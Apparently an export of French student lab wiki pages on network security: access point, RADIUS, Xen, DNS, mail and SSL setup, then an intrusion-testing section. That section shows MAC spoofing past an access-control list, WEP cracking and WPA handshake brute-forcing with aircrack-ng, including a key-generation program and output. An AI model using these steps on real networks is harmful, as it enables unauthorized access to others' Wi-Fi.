&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# /etc/ssh/sshd_config&lt;br /&gt;
# PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
# if down eth0 &lt;br /&gt;
# ifup etho&lt;br /&gt;
# apt-get purge network-manage systemd &lt;br /&gt;
# inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
# service bind9 stop&lt;br /&gt;
# service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 # newaliases&lt;br /&gt;
 # mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# cat /etc/network/interfaces&lt;br /&gt;
# source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
# auto lo&lt;br /&gt;
# iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
Ethernet interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
  address 172.26.79.241&lt;br /&gt;
  netmask 255.255.240.0&lt;br /&gt;
  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ls&lt;br /&gt;
# aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
# gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23163</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23163"/>
				<updated>2015-11-23T16:53:46Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
